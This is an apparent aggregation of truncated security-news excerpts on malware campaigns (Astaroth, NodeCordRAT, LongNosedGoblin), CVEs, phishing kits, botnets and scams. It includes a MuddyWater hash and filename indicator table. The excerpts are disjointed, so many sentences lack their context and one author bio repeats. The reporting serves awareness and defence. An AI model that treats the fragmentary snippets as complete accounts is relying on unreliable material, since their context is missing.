Cybersecurity researchers have disclosed details of a new campaign that uses WhatsApp as a distribution vector for a Windows banking trojan called Astaroth in attacks targeting Brazil.

"The malware retrieves the victim's WhatsApp contact list and automatically sends malicious messages to each contact to further spread the infection," the cybersecurity company said in a report shared with The Hacker News.

Astaroth, also called Guildma, is a banking malware that has been detected in the wild since 2015, primarily targeting users in Latin America, particularly Brazil, to facilitate data theft.

Sophos, in a report published in November 2025, said it's tracking a multi-stage malware distribution…

A China-nexus threat actor known as UAT-7290 has been attributed to espionage-focused intrusions against entities in South Asia and Southeastern Europe.

Some of the notable Windows implants put to use by the threat actor include RedLeaves (aka BUGJUICE) and ShadowPad, both exclusively linked to Chinese hacking groups.

Also deployed by UAT-7290 is a backdoor called Bulbature that's engineered to transform a compromised edge device into an ORBs.

The cybersecurity company said the threat actor shares tactical and infrastructure overlaps with China-linked adversaries known as Stone Panda and RedFoxtrot (aka Nomad Panda).

"The threat actor conducts extensive reconnaissance of target organization…

Every week, new hacks, scams, and security problems show up somewhere.

This week's stories show how fast attackers change their tricks, how small mistakes turn into big risks, and how the same old tools keep finding new ways to break in.

These stories show how fast things can change and how small risks can grow big if ignored.

Keep your systems updated, watch for the quiet stuff, and don't trust what looks normal too quickly.

Next Thursday, ThreatsDay will be back with more short takes from the week's biggest moves in hacking and security.

Chainguard, the trusted source for open source, has a unique view into how modern organizations actually consume open source software and where they run into risk and operational burdens.

That's why they created The State of Trusted Open Source, a quarterly pulse on the open source software supply chain.

Python led the way as the most popular open source image among Chainguard's global customer base, powering the modern AI stack.

FIPS is not the whole story, but it illustrates a broader truth: compliance is a universal driver, emphasizing the need for trusted open source across the entire software stack.

Ready to get started with the trusted source for open source?

Cisco has released updates to address a medium-severity security flaw in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) with a public proof-of-concept (PoC) exploit.

The vulnerability, tracked as CVE-2026-20029 (CVSS score: 4.9), resides in the licensing feature and could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information.

"This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC," Cisco said in a Wednesday advisory.

"An attacker could exploit this vulnerability by uploading a malicious file to the application."

It affect…

Cybersecurity researchers have discovered three malicious npm packages that are designed to deliver a previously undocumented malware called NodeCordRAT.

The names of the packages, all of which were taken down as of November 2025, are listed below.

"The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the malicious payload," Zscaler ThreatLabz researchers Satyam Singh and Lakhan Parashar said.

"This final payload, named NodeCordRAT by ThreatLabz, is a remote access trojan (RAT) with data-stealing capabilities."

NodeCordRAT gets its name from the use of npm as a propagation vector and Discord se…

Cybersecurity researchers have disclosed details of multiple critical-severity security flaws affecting Coolify, an open-source, self-hosting platform, that could result in authentication bypass and remote code execution.

The list of vulnerabilities is as follows -CVE-2025-66209 (CVSS score: 10.0) - A command injection vulnerability in the database backup functionality allows any authenticated user with database backup permissions to execute arbitrary commands on the host server, resulting in container escape and full server compromise(CVSS score: 10.0) - A command injection vulnerability in the database backup functionality allows any authenticated user with database backup permissions to …

As 2025 draws to a close, Tony looks back at the cybersecurity stories that stood out both in December and across the whole of this yearAs we close out 2025, it's time for ESET Chief Security Evangelist Tony Anscombe to review some of the main cybersecurity stories from both the final month of the year and 2025 as a whole.

While staggering, this figure is still just the tip of the iceberg.

The Texas Attorney General is suing five major TV manufacturers, alleging that they illegally collected their users' data by secretly capturing what the viewers watch.

Indeed, Tony goes on to take a look back at some of the most notable cyber-incidents for the entire year, highlighting some of the most pe…

Brushing scams are a type of e-commerce fraud where a seller sends a package to an apparently random person’s address.

It shouldn’t take too much effort to work out if you’ve been singled out by brushing scammers.

It’s yours to keep, if you want toHow do I stay safe from brushing scams?

There are steps you can also take to stop brushing scams from even targeting you.

Brushing scams are just one of many ways fraudsters weaponize your personal information against you.

We provide our method to reproduce the crash using a simple 12-bit or 16-bit JPG image, and an examination of the initial released patch.

CVE-2025-50165 is a flaw in the encoding and compressing process of a JPG image, not in its decoding.

Zscaler’s findings, as well as the description provided by Microsoft, reveal that the flaw stems from the dereference of an uninitialized function pointer in WindowsCodecs.dll, which is part of the Windows Imaging Component.

We analyzed the vulnerable version 10.0.26100.4768 (SHA-1: 5887D96565749067564BABCD3DC5D107AB6666BD), and then performed a binary comparison with the first patched version 10.0.26100.4946 (SHA-1: 4EC1DC0431432BC318E78C520387911EC44F84…

We provide a detailed analysis of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger, and other tools used by LongNosedGoblin.

NosyDoor Stage 3 – payloadNosyDoor’s third stage, the main payload, is a C#/.NET backdoor with the internal name OneDrive and with PDB path E:\Csharp\Thomas\Server\ThomasOneDrive\obj\Release\OneDrive.pdb.

NosyStealer Stage 2 – injectorWe observed two NosyStealer Stage 2 samples – one (SERV.dll) in our telemetry, and the other (msi.dll) uploaded to VirusTotal from Malaysia.

NosyStealer Stage 4 – payloadAgain, like NosyStealer Stage 3 – loader, this stage is shellcode that decrypts, loads, and executes an embedded PE file in memory using Donut’s reflecti…

A view of the H2 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research expertsThe second half of the year underscored just how quickly attackers adapt and innovate, with rapid changes sweeping across the threat landscape.

AI-powered malware moved from theory to reality in H2 2025, as ESET discovered PromptLock, the first known AI-driven ransomware, capable of generating malicious scripts on the fly.

Meanwhile, CloudEyE, also known as GuLoader, surged into prominence, skyrocketing almost thirtyfold in ESET telemetry.

On the Android platform, NFC threats continued to grow in scale and sophistication, with an 87% increase in ESET telemet…

“A City of a Thousand Zero Days” is the partial title of a talk at Black Hat Europe 2025.

Compounding the issue, the software is hosted on public-facing IP addresses; thus, it’s accessible from the internet.

One comment I distinctly remember from the research is that the protocol used by the ICS device concerned was never designed to be connected to the internet.

The talk by Gjoko raised a similar concern: the building management system was not designed to be public facing on the internet, and the vendor recommends to secure it behind a virtual private network (VPN).

Building management systems are one example of this.

Being seen as reliable is good for ‘business’ and ransomware groups care about 'brand reputation' just as much as their victimsBlack Hat Europe 2025 opened with a presentation by Max Smeets of Virtual Rotes titled ‘Inside the Ransomware Machine’.

At their height, between 2022-2024, the group had 194 affiliates, of which 110 had managed to get a cyberattack to the point of negotiation, with 80 of the affiliates succeeding in getting paid by the ransomware group.

Reputation is everythingA key message delivered by Max was regarding reputation, both of the victim and the ransomware group.

The victim company needs to uphold their reputation with their customers and any hint of a data breach can …

Which brings to mind Schrödinger’s cat, the famous thought experiment where a cat in a sealed box is simultaneously alive and dead – until you look inside.

But now I’m going to pick holes in the analogy a little whilst hoping to underscore the key message.

Therefore, the quantum breach analogy doesn’t quite hold.

And that’s even if you can recruit enough people due to the much reported, cybersecurity skills shortage.

Stress is probably one of the words most used in cybersecurity teams the world over, when describing their day-to-day – and it’s hardly surprising.

Despite their wordy nomenclature, every report mentioned above has a beneficial role in canvassing the colorful endpoint security landscape.

Some, like the MITRE ATT&CK Evaluations, go as far as to pit products against known advanced adversary attacks.

Producing value is one thing, but keeping it safe is another: hence the need for appropriate endpoint security measures.

Most well-regarded independent analyst and lab test reports focus on endpoints, since they’re at the crossroads of every activity, including malign.

MITRE ATT&CK Evaluations Enterprise is the one for you then.

Put simply, a whaling cyberattack is one targeted at a high-profile, senior member of the corporate leadership team.

Or to hijack their email account in order to launch BEC attacks at subordinates impersonating the whale to get a smaller fish to make a big money transfer.

With AI, whaling attacks increase in scale and effectiveness, as sophisticated capabilities become democratized to more threat actors.

Taking out the whalersThere are several ways security teams can help to mitigate the risks of spearphishing and BEC attacks.

More generally, your organization may want to start limiting the kind of corporate information it shares publicly.

Often, threat actors research the individual they’re targeting in order to improve their success rates.

If IT doesn’t properly manage the accounts, credentials and privileges of its users and machines, security blind spots inevitably emerge.

How to enhance identity securityA considered, multi-layered approach to identity security can help mitigate the risk of serious compromise.

Revisit security training for all employees, from the CEO down, to ensure they know the importance of identity security, and can identify the latest phishing tactics.

Best practice identity security starts with a prevention-first mindset.

E02DD79A8CAED662969F 6D5D0792F2CB283116E8 66f3e097e4tnyHR .exe WinGo/TrojanProxy .Agent.D MuddyWater – go‑socks5 reverse tunnel.

E8F4EA3857EF5FDFEC1A 2063D707609251F207DB main .exe WinGo/TrojanProxy .Agent.D MuddyWater – go‑socks5 reverse tunnel.

F26CAE9E79871DF3A47F A61A755DC028C18451FC 7295be2b1fAzMZI .exe WinGo/TrojanProxy .Agent.D MuddyWater – go‑socks5 reverse tunnel.

FF09608790077E1BA52C 03D9390E0805189ADAD7 20d188afdcpfLFq .exe WinGo/TrojanProxy .Agent.D MuddyWater – go‑socks5 reverse tunnel.

A9747A3F58F8F408FECE FC48DB0A18A1CB6DACAE AppVs .exe WinGo/TrojanProxy .Agent.D MuddyWater – go‑socks5 reverse tunnel.

It could feasibly be described as the largest open database of corporate information in the world: a veritable treasure trove of job titles, roles, responsibilities and internal relationships.

It’s also where recruiters post job listings, which may overshare technical details that can be leveraged later on in spearphishing attacks.

They might also share corporate email addresses in Git commit configurations.

Here are some hypothetical examples:An adversary finds LinkedIn information on a new starter in an IT role at company A, including their core role and responsibilities.

Update security awareness programs to ensure that all employees, from executives down, understand the importance of no…

Data exposure by top AI companies, the Akira ransomware haul, Operation Endgame against major malware families, and more of this month's cybersecurity newsNovember 2025 is almost behind us, and it's time for ESET Chief Security Evangelist Tony Anscombe to look at cybersecurity stories that raised the alarms, moved the needle or offered vital lessons over the past 30 or so days.

Here's some of what caught Tony's eye this month:many of the world's largest Ai companies inadvertently leak their secrets such as API keys, tokens, and sensitive credentials in their GitHub repositories, according to cloud security giant Wiz,the Akira ransomware group has netted $244 million from its malicious activ…

Rose argues that insider risk now includes AI systems, automated workflows, and agents that can take action on their own.

OpenAEV: Open-source adversarial exposure validation platformOpenAEV is an open source platform designed to plan, run, and review cyber adversary simulation campaigns used by security teams.

Identity security planning for 2026 is shifting under pressureIdentity security planning is becoming more focused on scale, governance, and operational strain, according to the Identity Security Outlook 2026 report.

What European security teams are struggling to operationalizeEuropean security and compliance teams spend a lot of time talking about regulation.

Debian seeks volunteers …

Authentication codes are synchronized within the account, letting users access them on both the mobile app or browser extension.

NordPass Authenticator requires biometric verification before revealing the security code.

Business users have already been able to access NordPass Authenticator to secure their corporate accounts.

With the TOTP support, NordPass functions as an authentication tool, generating two-factor codes for any credential the user has configured.

For each account with two-factor authentication enabled, the user must first add its TOTP setup key to the corresponding item in the vault.

The European Commission has opened a public call for evidence on European open digital ecosystems, a step toward a planned Communication that will examine the role of open source in EU’s digital infrastructure.

Role of open source in digital systemsThe Commission’s document describes open source software as a foundational component of the digital environment.

It estimates that between 70% and 90% of software code used in digital systems relies on open source components.

Many open source projects originate in the EU, while the economic value associated with their use is often captured elsewhere.

Open source software is described as supporting transparency and inspection, which can contribute…

Welcome to a new year of my Patch Tuesday forecast blog where I provide a summary of Microsoft and other vendor’s security patch activity (and reported issues) for the month, talk about some of the latest trends, processes, and evolution of patch management, and finally yes, provide a forecast of what security patches are expected to release next week on Patch Tuesday.

To start, in their Known Issues report they announced that ‘Message Queuing (MSMQ) might fail with the December 2025 Windows security update’.

Apple patches two actively exploited WebKit zero-daysApple provided security updates for many of their products on December 12.

The usual Windows 10 ESU, Windows 11, and Server updates…

AppSec teams have spent the last decade hardening externally facing applications, API security, software supply chain risk, CI/CD controls, and cloud-native attack paths.

They pull external data, call internal APIs, reason over documents, collaborate with other agents, and take action in real time.

For security teams, continuous discovery is no longer just about visibility, it is about containing risk.

This creates a familiar pattern for security teams: incidents that originate outside the pipeline but land squarely in their court for remediation.

AppSec teams need visibility into how agents behave at runtime, including unexpected API calls, data movement, and action chaining.

TrackerControl is an open-source Android application designed to give users visibility into and control over the hidden data within mobile apps.

Users can view detected tracker connections, manage blocklists used for identification, and enable secure DNS (DoH) to protect DNS queries during traffic analysis.

It integrates signatures from established tracker analysis projects to detect tracking libraries embedded in app code.

App inspection and platform availabilityIn addition to live network monitoring, TrackerControl can analyze installed apps for known tracking libraries.

This version will support tracker analysis, although blocking capabilities may be limited by platform constraints.

Security teams spend a lot of time explaining why detection systems need more compute.

What the research set out to measureThe researchers designed the study to evaluate detection models across two dimensions.

Security teams can see how much compute a model uses to reach a given detection result without relying on separate dashboards or cost reports.

What this means for security teamsThe findings give security teams another operational signal to consider when evaluating detection systems.

Measuring detection performance and energy consumption together gives security teams a way to reason about model behavior beyond accuracy metrics alone.

Wi-Fi networks are taking on heavier workloads, more devices, and higher expectations from users who assume constant access everywhere.

A new Wireless Broadband Alliance industry study shows that this expansion is reshaping priorities around security, identity, and trust, alongside adoption of new Wi-Fi standards.

Wi-Fi access point shipments to the MDU vertical world markets, forecast: 2024 to 2030 (Source: Wireless Broadband Alliance)Wi-Fi 7 moves quickly into the fieldWi-Fi 7 adoption advanced faster than many earlier generations.

From a security perspective, that raises the importance of visibility, telemetry, and consistent access control across all radios and bands.

Network behaviorEx…

Choppy AI introduces natural-language–driven experiences that make cloud security exploration, investigation, and analysis more intuitive, while providing transparency, control, and trust for security teams.

As a result, Upwind has launched Choppy AI to take a different approach.

“Choppy AI is designed to make cloud security exploration and investigation faster and more intuitive while making the logic behind it clear and auditable,” said Amiram Shachar, CEO at Upwind.

In the Vulnerability module, Choppy AI introduces an interactive AI Mode that enables conversational investigation.

The launch of Choppy AI builds on Upwind’s recent introduction of Inside-Out AI Security across its unified C…

An unauthenticated remote code execution vulnerability (CVE-2025-37164) affecting certain versions of HPE OneView is being leveraged by attackers, CISA confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog.

About HPE OneView and CVE-2025-37164HPE OneView is a centralized infrastructure management platform used to deploy, monitor, and manage HPE data center hardware and software from a single interface.

CVE-2025-37164 was privately reported by security researcher Nguyen Quoc Khanh and Hewlett Packard Enterprise released hotfixes on December 16, 2025.

HPE says that OneView versions before v11.0 are vulnerable, and organizations should upgrade to it, as there are no worka…

Vannadium has launched Leap, a platform that combines blockchain-level data integrity with real-time, on-chain performance.

As AI is adopted in sectors like healthcare, finance, and supply chain, the reliability of underlying data has become a critical concern.

“Leap means you can prove where data came from, how it was used, and whether it can be trusted.”“Leap delivers real-time, on-chain data at enterprise scale,” said Laura Fredericks, Chief Growth Officer.

“Not hashes or references, but actual video, documents, and sensitive data, all verified and permissioned on chain.”Leap runs on Vannadium’s proprietary Diffusion Protocol, a high-speed coordination layer that moves on-chain data at b…

“Enterprises want to move quickly, but they also recognize that AI without data security and governance is a risk they cannot afford.

“Cyera’s AI-native platform gives enterprises unified visibility and control of their data, helping eliminate blind spots and accelerate secure AI adoption.

This year, the company introduced AI Guardian, expanding its offering into a comprehensive security platform designed for the new era of AI-driven businesses.

“The move toward unified data security platforms reflects how enterprises are thinking about securing sensitive information as AI adoption accelerates.

“Organizations need clear visibility and strong controls to protect sensitive data across increas…

Trend Micro has released a critical patch fixing several remotely exploitable vulnerabilities in Apex Central (on-premise), including a flaw (CVE-2025-69258) that may allow unauthenticated attackers to achieve code execution on affected installations.

The most critical of the three vulnerabilities is CVE-2025-69258, a vulnerability that could allow unauthenticated attackers to load a malicious DLL into the solution’s MsgReceiver.exe process and execute it with SYSTEM privileges.

Like CVE-2025-69258, CVE-2025-69259 and CVE-2025-69260 can also be triggered by unauthenticated attackers sending a specially crafted message to the MsgReceiver.exe process, which listens on default TCP port 20001.

…

Security and operations teams often work with firewall platforms that require frequent tuning or upgrades to meet evolving network demands.

IPFire has released its 2.29 Core Update 199, aimed at network and protection teams that manage this open source firewall distribution.

Wi-Fi and network protocol support changesCore Update 199 adds support for the latest Wi-Fi standards, including Wi-Fi 6 and Wi-Fi 7.

The update also brings native Link Local Discovery Protocol (LLDP) and Cisco Discovery Protocol (CDP) support.

The change delivers a range of stability and security fixes from the broader ecosystem that underpins firewall operations.

The most prevalent techniques used in phishing kits included URL obfuscation, MFA bypass, and CAPTCHA abuse.

CoGUICoGUI is a phishing kit with advanced evasion and anti-detection capabilities, commonly used by Chinese-speaking threat actors.

Whisper 2FAWhisper 2FA is a lightweight phishing kit built for fast deployment and MFA bypass, using AJAX-based exfiltration instead of complex reverse proxies.

It features strong anti-analysis obfuscation and supports multiple MFA bypass methods, including push notifications, SMS, voice calls, and app-based codes.

GhostFrameGhostFrame is a stealth-focused phishing kit that emphasizes obfuscation and URL concealment.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

And the more groups of AI agents are given tasks that require cooperation and collaboration, the more those human-like dynamics emerge.

While generative AI generates, agentic AI acts and achieves goals such as automating supply chain processes, making data-driven investment decisions or managing complex project workflows.

Understanding Agentic AI behaviorTo understand the collective behaviors of agentic AI systems, we need to examine the individual AIs that comprise them.

The fact that groups of agentic AIs are working more like human teams doesn’t necessarily indicate that machines have inherently human-like characteristics.

Likewise, successful agentic AI systems work far better when they…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

We don’t have many details:President Donald Trump suggested Saturday that the U.S. used cyberattacks or other technical capabilities to cut power off in Caracas during strikes on the Venezuelan capital that led to the capture of Venezuelan President Nicolás Maduro.

If true, it would mark one of the most public uses of U.S. cyber power against another nation in recent memory.

These operations are typically highly classified, and the U.S. is considered one of the most advanced nations in cyberspace operations globally.

Wired is reporting on Chinese darknet markets on Telegram.

The ecosystem of marketplaces for Chinese-speaking crypto scammers hosted on the messaging service Telegram have now grown to be bigger than ever before, according to a new analysis from the crypto tracing firm Elliptic.

The crypto romance and investment scams regrettably known as “pig butchering”—carried out largely from compounds in Southeast Asia staffed with thousands of human trafficking victims—have grown to become the world’s most lucrative form of cybercrime.

They pull in around $10 billion annually from US victims alone, according to the FBI.

By selling money-laundering services and other scam-related offerings to those ope…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

404 Media has the story:Unlike many of Flock’s cameras, which are designed to capture license plates as people drive by, Flock’s Condor cameras are pan-tilt-zoom (PTZ) cameras designed to record and track people, not vehicles.

In one case, we were able to watch a man rollerblade down Brookhaven, Georgia’s Peachtree Creek Greenway bike path.

The Flock camera zoomed in on him and tracked him as he rolled past.

Minutes later, he showed up on another exposed camera livestream further down the bike path.

The camera’s resolution was good enough that we were able to see that, when he stopped beneath one of the cameras, he was watching rollerblading videos on his phone.

LinkedIn Job ScamsInteresting article on the variety of LinkedIn job scams around the world:In India, tech jobs are used as bait because the industry employs millions of people and offers high-paying roles.

In Kenya, the recruitment industry is largely unorganized, so scamsters leverage fake personal referrals.

In Mexico, bad actors capitalize on the informal nature of the job economy by advertising fake formal roles that carry a promise of security.

These are scams involving fraudulent employers convincing prospective employees to send them money for various fees.

There is an entirely different set of scams involving fraudulent employees getting hired for remote jobs.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Many of these programs have long been operated by a mix of humans and machines, even if not previously using modern AI tools such as Large Language Models.

In 2023, a Colombian judge was the first publicly to use AI to help make a ruling.

Policymakers worldwide are already using AI in many aspects of lawmaking.

Examples from around the globe demonstrate how legislatures can use AI as tools for tapping into constituent feedback to drive policymaking.

In the hands of a society that wants to distribute power, AI can help to execute that.

New research:

Abstract: Coleoid cephalopods have the most elaborate camouflage system in the animal kingdom. This enables them to hide from or deceive both predators and prey. Most studies have focused on benthic species of octopus and cuttlefish, while studies on squid focused mainly on the chromatophore system for communication. Camouflage adaptations to the substrate while moving has been recently described in the semi-pelagic oval squid (Sepioteuthis lessoniana). Our current study focuses on the same squid’s complex camouflage to substrate in a stationary, motionless position. We observed disruptive, uniform, and mottled chromatic body patterns, and we identified a threshold of contrast…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

This is pretty scary:Urban VPN Proxy targets conversations across ten AI platforms: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), Meta AI.

For each platform, the extension includes a dedicated “executor” script designed to intercept and capture conversations.

The only way to stop the data collection is to uninstall the extension entirely.

[…]The data collection operates independently of the VPN functionality.

Whether the VPN is connected or not, the harvesting runs continuously in the background.

News:The Danish Defence Intelligence Service (DDIS) announced on Thursday that Moscow was behind a cyber-attack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites in the lead-up to the municipal and regional council elections in November.

The first, it said, was carried out by the pro-Russian group known as Z-Pentest and the second by NoName057(16), which has links to the Russian state.

The most typical of these uninvited guests are small programs that turn the device into a residential proxy node that is resold to others.

Brundage says Kimwolf grew rapidly by abusing a glaring vulnerability in many of the world’s largest residential proxy services.

Kilmer said one model of unsanctioned Android TV boxes that is especially popular — the Superbox, which we profiled in November’s Is Your Android TV Streaming Box Part of a Botnet?

At that point, your home’s public IP address will show up for rent at the website of some residential proxy provider.

Brundage also has compiled a list of the unofficial Android TV boxes that are most highly represented in the Kimwolf botnet.

Your engagement this past year here has been tremendous and truly a salve on a handful of dark days.

The arrests came shortly after the FBI and the Dutch police seized dozens of servers and domains for the group.

In June, KrebsOnSecurity.com was hit by the largest DDoS attack that Google had ever mitigated at the time (we are a grateful guest of Google’s excellent Project Shield offering).

Another Aisuru attack on Cloudflare just days later practically doubled the size of the June attack against this website.

If you like the content we publish at KrebsOnSecurity.com, please consider making an exception for our domain in your ad blocker.

Democratic lawmakers have urged the SEC to investigate what they call “concerning ties to President Trump and his family” as potential conflicts of interest and foreign influence.

In October, President Trump pardoned Changpeng Zhao, the founder of the world’s largest cryptocurrency exchange Binance.

President Trump this term has fired most of the people involved in processing Freedom of Information Act (FOIA) requests for government agencies.

CONSUMER PROTECTION, PRIVACYAt the beginning of this year, President Trump ordered staffers at the Consumer Financial Protection Bureau (CFPB) to stop most work.

Nevertheless, it emerged in June that the Trump administration has built a central databas…

A decade ago, ending up at one of these parked domains came with a relatively small chance of being redirected to a malicious destination: In 2014, researchers found (PDF) that parked domains redirected users to malicious sites less than five percent of the time — regardless of whether the visitor clicked on any links at the parked page.

Infoblox found parked websites are benign if the visitor arrives at the site using a virtual private network (VPN), or else via a non-residential Internet address.

A defanged list of these typosquatting domains is available here (the dots in the listed domains have been replaced with commas).

“It was often a chain of redirects — one or two domains outside p…

Microsoft today pushed updates to fix at least 56 security flaws in its Windows operating systems and supported software.

This final Patch Tuesday of 2025 tackles one zero-day bug that is already being exploited, as well as two publicly disclosed vulnerabilities.

Despite releasing a lower-than-normal number of security updates these past few months, Microsoft patched a whopping 1,129 vulnerabilities in 2025, an 11.9% increase from 2024.

The zero-day flaw patched today is CVE-2025-62221, a privilege escalation vulnerability affecting Windows 10 and later editions.

For anyone seeking a more granular breakdown of the security updates Microsoft pushed today, check out the roundup at the SANS In…

A sprawling academic cheating network turbocharged by Google Ads that has generated nearly $25 million in revenue has curious ties to a Kremlin-connected oligarch whose Russian university builds drones for Russia’s war against Ukraine.

UK companies belonging to the group that have been shut down by Google Ads since Jan 2025 include:–Proglobal Solutions LTD (advertised nerdifyit[.

Currently active Google Ads accounts for the Nerdify brands include:-OK Marketing LTD (advertising geekly-hub[.

For a number of years, Lobov and Perkon co-produced a cross-cultural event in the U.K. called Russian Film Week.

While Synergy University promotes itself as Russia’s largest private educational institutio…

The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.

The website scanning service urlscan.io shows thousands of these phishing domains have been deployed in just the past few days alone.

Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting AT&T customers:Ford Merrill works in security research at SecAlliance, a CSIS Security Group company.

CAVEAT EMPTORMany SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious.

“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill sai…

A prolific cybercriminal group that calls itself “Scattered LAPSUS$ Hunters” has dominated headlines this year by regularly stealing data from and publicly mass extorting dozens of major corporations.

Scattered LAPSUS$ Hunters (SLSH) is thought to be an amalgamation of three hacking groups — Scattered Spider, LAPSUS$ and ShinyHunters.

But last week, SLSH announced on its Telegram channel the release of their own ransomware-as-a-service operation called ShinySp1d3r.

The individual responsible for releasing the ShinySp1d3r ransomware offering is a core SLSH member who goes by the handle “Rey” and who is currently one of just three administrators of the SLSH Telegram channel.

Incredibly, Rey w…

UNBOXINGCensys’s Ashley said the phone home to China’s Tencent QQ instant messaging service was the first red flag with the Superbox devices she examined.

In July 2025, Google filed a “John Doe” lawsuit (PDF) against 25 unidentified defendants dubbed the “BadBox 2.0 Enterprise,” which Google described as a botnet of over ten million Android streaming devices that engaged in advertising fraud.

Several of the Android streaming devices flagged in Google’s lawsuit are still for sale on top U.S. retail sites.

Kilmer said Badbox 2.0 was used as a distribution platform for IPidea, a China-based entity that is now the world’s largest residential proxy network.

-Generic TV streaming devices advertis…

Sixteen months later, however, Mozilla is still promoting Onerep.

This week, Mozilla announced its partnership with Onerep will officially end next month.

In a statement published Tuesday, Mozilla said it will soon discontinue Monitor Plus, which offered data broker site scans and automated personal data removal from Onerep.

Mozilla said current Monitor Plus subscribers will retain full access through the wind-down period, which ends on Dec. 17, 2025.

Shelest released a lengthy statement wherein he acknowledged maintaining an ownership stake in Nuwber, a data broker he founded in 2015 — around the same time he launched Onerep.

An intermittent outage at Cloudflare on Tuesday briefly knocked many of the Internet’s top destinations offline.

Some affected Cloudflare customers were able to pivot away from the platform temporarily so that visitors could still access their websites.

However, some customers did manage to pivot their domains away from Cloudflare during the outage.

“Then you see through DNS changes that the target has eliminated Cloudflare from their web stack due to the outage.

But also look hard at the behavior inside your org.”Scott said organizations seeking security insights from the Cloudflare outage should ask themselves:1.

Microsoft this week pushed security updates to fix more than 60 vulnerabilities in its Windows operating systems and supported software, including at least one zero-day bug that is already being exploited.

Affected products this month include the Windows OS, Office, SharePoint, SQL Server, Visual Studio, GitHub Copilot, and Azure Monitor Agent.

Many of the more concerning bugs addressed by Microsoft this month affect Windows 10, an operating system that Microsoft officially ceased supporting with patches last month.

As that deadline rolled around, however, Microsoft began offering Windows 10 users an extra year of free updates, so long as they register their PC to an active Microsoft accoun…

More recently, Lighthouse has been used to spoof e-commerce websites, financial institutions and brokerage firms.

Google’s lawsuit alleges the purveyors of Lighthouse violated the company’s trademarks by including Google’s logos on countless phishing websites.

Ford Merrill works in security research at SecAlliance, a CSIS Security Group company, and he’s been tracking Chinese SMS phishing groups for several years.

Merrill said many Lighthouse customers are now using the phishing kit to erect fake e-commerce websites that are advertised on Google and Meta platforms.

But he said the Chinese mobile phishing market is so lucrative right now that it’s difficult to imagine a popular phishing serv…

The Washington Post recently reported that more than a half-dozen federal departments and agencies were backing a proposed ban on future sales of TP-Link devices in the United States.

“TP-Link vigorously disputes any allegation that its products present national security risks to the United States,” Ricca Silverio, a spokeswoman for TP-Link Systems, said in a statement.

Microsoft found the hacker groups were leveraging the compromised TP-Link systems to conduct “password spraying” attacks against Microsoft accounts.

Happily, TP-Link users spooked by the proposed ban may have an alternative to outright junking these devices, as many TP-Link routers also support open-source firmware options l…

The founder of a spyware company that encouraged customers to secretly monitor their romantic partners has pleaded guilty to federal charges - marking one of the few successful US prosecutions of a stalkerware operator.

If you visited the pcTattletale website you would be told that it was "employee and child monitoring software" designed to "protect your business and family."

The reality is that stalkerware like pcTattletale can also be used for tracking the location and activities of people without their knowledge.

Using stalkerware to spy on others without their permission is never acceptable.

If you're concerned that someone might be using spyware against you, visited the website of the …

All this, and much more, in this episode of the “Smashing Security” podcast with Graham Cluley, and special guest Lesley Carhart.

Smashing Security #449:How to scam someone in seven days [Your browser does not support the audio element]Host:Graham Cluley:@grahamcluley.com @[email protected] / grahamcluleyGuest:Lesley Carhart:@hacks4pancakes.com‬ @[email protected] / lcarthartEpisode links:Sponsored by:Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Join Sma…

Police in India have arrested a former Coinbase customer service agent who is believed to have been bribed by cybercriminal gangs to access sensitive customer information.

"Thanks to the Hyderabad Police in India, an ex-Coinbase customer service agent was just arrested.

In interviews since the incident, Armstrong has described how cybercriminal gangs were offering US $250,000 bribes to customer service representatives to leak sensitive data.

"We started getting customer support agents get offered like 250 grand bribes to turn over customer information.

And then the attackers would call up our customers and say, hey, here's Coinbase support.

This Christmas special of The AI Fix podcast sets out to answer that question in the most sensible way possible: by consulting chatbots, Google’s festive killjoys, and the laws of relativistic physics.

